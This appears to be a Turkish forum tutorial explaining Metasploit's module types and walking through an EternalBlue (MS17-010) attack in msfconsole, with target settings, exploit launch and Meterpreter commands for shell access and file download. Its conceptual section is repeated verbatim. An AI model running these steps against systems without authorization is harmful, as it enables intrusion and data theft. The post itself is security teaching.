İyi günler bugün size Metasploit aracı nedir ne işe yarar ve nasıl kullanılacağını anlatacağım.
Metasploit bilgisayar sistemlerindeki güvenlik açıklarını test etmek için kullanılan çok kapsamlı bir sızma testi platformudur. Tek başına bir virüs ya da otomatik saldırı aracı değildir. Daha çok bir güvenlik uzmanının yanında taşıdığı gelişmiş bir araç çantası gibidir. Bu araç çantasının içinde farklı görevler için hazırlanmış birçok parça bulunur ve her parça sürecin başka bir aşamasında kullanılır.
Metasploit kullanılırken en önemli kavramlar exploit, payload, auxiliary, post, encoder ve NOP modülleridir. Exploit hedef sistemde bulunan güvenlik açığını kullanarak sisteme giriş yolu oluşturan kısımdır. Yani kilitli bir kapının zayıf noktasını bulup oradan kapıyı açmaya benzer. Bir yazılımda hata varsa exploit bu hatayı kullanarak sistemin kontrolünü ele geçirmeye çalışır.
Exploit başarılı olursa devreye payload girer. Payload içeri girildikten sonra sistemde çalışacak olan asıl koddur. Komut satırı açabilir, uzaktan kontrol sağlayabilir, bilgi toplayabilir ya da farklı işlemler yapabilir. Yani exploit kapıyı açan araçsa payload içeri girip hareket eden unsurdur.
Auxiliary modüller doğrudan sızma yapmaz. Bunlar keşif ve bilgi toplama araçlarıdır. Port tarama, servis tespiti, parola deneme gibi işlemler auxiliary ile yapılır. Bu aşama bir binaya girmeden önce çevreyi incelemek gibidir.
Sisteme erişim sağlandıktan sonra kullanılan modüller post modülleridir. Yetki yükseltme, sistem bilgisi toplama, kayıtlı parolaları bulma veya kalıcılık sağlama gibi işlemler bu aşamada yapılır. Bu, içeri girdikten sonra binanın içini detaylı incelemeye benzer.
Encoder modülleri payloadın görünümünü değiştirerek güvenlik yazılımlarının bunu tanımasını zorlaştırır. NOP modülleri ise teknik olarak hiçbir şey yapmayan ancak payloadın bellekte düzgün çalışmasına yardımcı olan komutlardan oluşur.
Metasploit bilgisayar sistemlerindeki güvenlik açıklarını test etmek için kullanılan çok kapsamlı bir sızma testi platformudur. Tek başına bir virüs ya da otomatik saldırı aracı değildir. Daha çok bir güvenlik uzmanının yanında taşıdığı gelişmiş bir araç çantası gibidir. Bu araç çantasının içinde farklı görevler için hazırlanmış birçok parça bulunur ve her parça sürecin başka bir aşamasında kullanılır.
Metasploit kullanılırken en önemli kavramlar exploit, payload, auxiliary, post, encoder ve NOP modülleridir. Exploit hedef sistemde bulunan güvenlik açığını kullanarak sisteme giriş yolu oluşturan kısımdır. Yani kilitli bir kapının zayıf noktasını bulup oradan kapıyı açmaya benzer. Bir yazılımda hata varsa exploit bu hatayı kullanarak sistemin kontrolünü ele geçirmeye çalışır.
Exploit başarılı olursa devreye payload girer. Payload içeri girildikten sonra sistemde çalışacak olan asıl koddur. Komut satırı açabilir, uzaktan kontrol sağlayabilir, bilgi toplayabilir ya da farklı işlemler yapabilir. Yani exploit kapıyı açan araçsa payload içeri girip hareket eden unsurdur.
Auxiliary modüller doğrudan sızma yapmaz. Bunlar keşif ve bilgi toplama araçlarıdır. Port tarama, servis tespiti, parola deneme gibi işlemler auxiliary ile yapılır. Bu aşama bir binaya girmeden önce çevreyi incelemek gibidir.
Sisteme erişim sağlandıktan sonra kullanılan modüller post modülleridir. Yetki yükseltme, sistem bilgisi toplama, kayıtlı parolaları bulma veya kalıcılık sağlama gibi işlemler bu aşamada yapılır. Bu, içeri girdikten sonra binanın içini detaylı incelemeye benzer.
Encoder modülleri payloadın görünümünü değiştirerek güvenlik yazılımlarının bunu tanımasını zorlaştırır. NOP modülleri ise teknik olarak hiçbir şey yapmayan ancak payloadın bellekte düzgün çalışmasına yardımcı olan komutlardan oluşur.
Metasploit genellikle msfconsole adlı komut satırı arayüzü üzerinden kullanılır. Kullanıcı önce bu ortamı başlatır ve ardından hedefe uygun modülleri arar.
Metasploit konsolunu başlatmak için terminale şu komut yazılır
msfconsole
Program açıldığında Metasploit ortamına girilmiş olur. İlk adım genellikle hedefe uygun modülü bulmaktır. Bunun için search komutu kullanılır. Örneğin hedefte SMB servisi olduğu düşünülüyorsa
search smb
FTP için
search ftp
Apache için
search apache
Arama sonucunda uygun modül seçilir ve use komutu ile aktif hale getirilir
use exploit/windows/smb/ms17_010_eternalblue
Bu aşamada Metasploit seçilen açık üzerinden işlem yapmaya hazırdır. Ancak çalıştırmadan önce gerekli ayarların yapılması gerekir. Hedef IP adresi, bağlantının geri döneceği adres ve port bilgileri set komutu ile girilir
set RHOSTS 192.168.1.10
set LHOST 192.168.1.11
set RPORT 445
Gerekli ayarların eksiksiz olup olmadığını görmek için
show options
komutu kullanılır. Tüm ayarlar tamamlandıktan sonra modül çalıştırılır
exploit
veya
run
Eğer hedef sistem gerçekten savunmasızsa Metasploit sisteme erişim sağlayabilir. Başarılı durumlarda genellikle Meterpreter adı verilen gelişmiş bir kontrol oturumu açılır.
Meterpreter hedef sistem üzerinde oldukça geniş yetkilerle işlem yapmayı sağlar. Sistem bilgilerini öğrenme, dosyaları görüntüleme, komut çalıştırma ve ekran görüntüsü alma gibi işlemler yapılabilir. Örneğin
sysinfo
getuid
shell
ls
cd klasor
download dosya.txt
upload dosya.txt
screenshot
Bu aşama içeri girildikten sonra ortamı incelemek ve sistemin ne kadar kontrol edilebildiğini test etmek gibidir. Amaç zarar vermek değil güvenlik açıklarının gerçek etkisini anlamaktır.
Metasploit doğru ve yasal kullanımda sistem güvenliğini artırmak için son derece güçlü bir araçtır. Genellikle eğitim ortamlarında, laboratuvar sistemlerinde veya izinli sızma testlerinde kullanılır. İzinsiz sistemlere karşı kullanılması yasa dışıdır.
Moderatör tarafında düzenlendi:
